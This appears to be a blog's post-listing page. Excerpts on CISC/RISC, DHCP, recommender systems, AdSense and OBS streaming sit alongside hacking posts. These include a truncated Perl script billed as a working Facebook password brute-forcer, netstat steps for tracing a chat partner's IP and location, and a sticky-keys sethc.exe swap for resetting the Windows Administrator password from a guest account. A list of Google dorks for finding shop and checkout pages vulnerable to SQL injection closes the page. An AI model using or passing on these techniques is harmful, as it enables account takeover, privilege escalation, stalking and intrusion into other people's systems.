Skip to main content

Posts

Popular posts from this blog

CISC VS RISC computers (all details)

CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. The CISC approach attempts to minimize the number of instructions per program, sacrificing

DHCP principle , DHCP server and client communication process

1. Explain with principle: the DHCP server and client communication process DHCP stands for Dynamic Host Configuration Protocol. It handles the automatic assignment of IP addresses and other configuration settings for devices on your network. DHCP automates Network and Sharing Center in your control panel. This is especially good for people who have laptops, aren't hooked up to the Internet all the time and often move from place to place with their portable devices. They can simply get a new IP address as needed without having to do it manually. DHCP is designed to make the assignment of IP addresses and other network configuration information faster and easier. DHCP is a protocol that uses Level 4 on the OSI model. It communicates using User Datagram Protocol (UDP) datagrams through UDP Port 68. DHCP works with most current and past Windows clients, and also Linux, Macintosh, and many network-capable printers. DHCP is desi

Recommendation System literature review | Building a recommendation system

People have always relied on the recommendations from their peers or the advice of experts to support their decision making. Amazon.com has been using collaborative filtering for a decade to recommend products to their customers, and Netflix valued improvements to the recommender technology underlying their movie rental service at $1M via the widely published Netflix Prize [6]. Research on recommender algorithms garnered significant attention in 2006 when Netflix launched the Netflix Prize to improve the state of movie recommendation. The objective of this competition was to build a recommender algorithm that could beat their internal CineMatch algorithm in offline tests by 10%. It sparked a flurry of activity, both in academia and amongst hobbyists. The $1 M prize demonstrates the value that vendors place on accurate recommendations [8]. Recommender Systems provide the users with the suggestions of information that may be useful to the users to make their decisions on various sit

how to create adsense account in nepal ?

How to Create a new AdSense account ? Go to the  Monetization page . Get there by clicking your icon in the top right > Creator Studio. Then, in the left menu, click  Channel > Monetization . Go to the "How will I be paid?" section. From the  AdSense Association page , follow the "next" step to be directed to AdSense. Select the option at the bottom of the page to choose the Google Account you want to use. Enter the password for your Google Account. Accept the Adsense association. Provide your contact information and submit your AdSense application. You'll be redirected back to YouTube and will see a message saying that your AdSense application has been received. Adsense will  update you by mail  once your AdSense account is approved. Your AdSense ID will be updated on the  AdSense Association page. Note that it may take up to 48 hours for the association to be fully active. For more details : comment down or email me at :-anonymousnepalo

YouTube Channel Audit How To Live Stream On YouTube Gaming With Open Broadcaster Software (OBS)

The new users must have software which allows the live streaming on the YouTube platform. Make sure your account is with good standing. After the download of your stream, go to the dashboard which enable the live streaming Setup the encoder.  Open OBS and click on to the ‘Broadcast settings’ Check the audio tab and set the hot keys Add scenes of your gaming content and also have an option for creation of thumbnail Set the streaming options according to your requirements Set the preference to Gaming category and it allows you to appear on the live directory in the list This makes YouTube gaming updates your name in the list You can also go towards the advanced settings which helps you to promote the material during the streaming etc. Now push on to the OBS streaming on YouTube gaming platform.         https://www.youtube.com/watch?v=rXx9O79aG1w&feature=youtu.be watch video for this process

How to Become a Hacker | epic post | the grand post for becoming hacker | new 2017

How to Become a Hacker --------------------------------- 1. Learn TCP/IP, Basic Information gathering,Proxies, Socks, SSL, VPN, VPS, RDP, FTP,POP3,SMTP, Telnet, SSH. 2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility. 3. Learn a programming language that's compatible with all OS - Perl, Python, C . 4. Learn HTML, PHP, Javascript, ASP, XML, SQL,XSS, SQLI, RFI, LFI 5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games. 6. Code a fuzzer for common protocols - ftp,pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to sort out unique code in source codes. 8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use. 9. Pick a kernel i

pearl code for hacking facebook account | woking code for password bruteforce | new 2017

#!/usr/bin/perl # use strict; use Net::SSLeay::Handle; if(!defined($ARGV[0] && $ARGV[1])) { system('clear');                                                                                                                                                                                                                                                       print " \033[1;32m \n"; print " ▀█▀ ▒█▄░▒█ ▀▀█▀▀ ▒█▀▀▀ ▒█▀▀█ ▒█▄░▒█ ▒█▀▀▀ ▀▀█▀▀ \n"; print " ▒█░ ▒█▒█▒█ ░▒█░░ ▒█▀▀▀ ▒█▄▄▀ ▒█▒█▒█ ▒█▀▀▀ ░▒█░░ \n"; print " ▄█▄ ▒█░░▀█ ░▒█░░ ▒█▄▄▄ ▒█░▒█ ▒█░░▀█ ▒█▄▄▄ ░▒█░░ \n"; print "  \n"; print " ▒█▀▀█ ▒█░░░ ░█▀▀█ ▒█░░▒█ ▒█▀▀█ ▒█▀▀█ ▒█▀▀▀█ ▒█░▒█ ▒█▄░▒█ ▒█▀▀▄ \n"; print " ▒█▄▄█ ▒█░░░ ▒█▄▄█ ▒█▄▄▄█ ▒█░▄▄ ▒█▄▄▀ ▒█░░▒█ ▒█░▒█ ▒█▒█▒█ ▒█░▒█ \n"; print " ▒█░░░ ▒█▄▄█ ▒█░▒█ ░░▒█░░ ▒█▄▄█ ▒█░▒█ ▒█▄▄▄█ ░▀▄▄▀ ▒█░░▀█ ▒█▄▄▀ \n"; print " i am not responsible for your any illegal ac

How To Trace Location Of Any Person On Facebook| new 2017

How To Trace Location Of Any Person On Facebook! Tracing IP Address Of Person On Facebook Chat Using Command Prompt Using command prompt you can actually trace out the ip address  of a person you chatting on facebook. Just follow the steps below to proceed. 1. First of all start chatting with your friend whose ip address you want to get and make sure that all other apps and  background process must be stopped. 2. Now press Win+R of your keyboard, 3. Now type cmd and hit enter. 4. Now in the command prompt that appears type netstat -an and hit enter. 5. Now note down the ip address of person. 6. Now you need to scan that ip address to know the actual location of the person that you can checkout from http://www.ip-adress.com/ip_tracer enjoy!!!!

How to hack admin account through guest account? | new 2017

How to hack admin account through guest account. 1) Go to C:/windows/system32. 2) Copy cmd.exe and paste it on desktop. 3) Rename cmd.exe to sethc.exe. 4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes. 5) Now Log out from your guest account and at the user select window,press shift key 5 times. 6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz” can be any password you like and press enter. You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password. Now You have hacked admin through guest account. enjoy ...

Google Dorks for sql injection | new 2017 |

default.php?catID= cart_additem.php?id= item_show.php?code_no= details.php?BookID= item.php?prodtype= inurl:php?id+site:it+show inurl:php?id+site:fr+show inurl:php?id+site:dk+shop inurl:php?id+site:pt+shop inurl:php?id+site:za+shop inurl:php?id+site:fi+shop acclogin.php?cartID= addToCart.php?idProduct= inurl:php?id+site:es+shop inurl:php?id+site:ro+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+checkout List.php?CatID= inurl:php?id+site:au+product inurl:php?id+site:au+succes inurl:php?id+site:uk+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+shop inurl:php?id+site:it+shop inurl:php?id+site:de+shop inurl:php?id+site:pl+shop itemdetail.php?item= inurl:php?id+site:au+checkout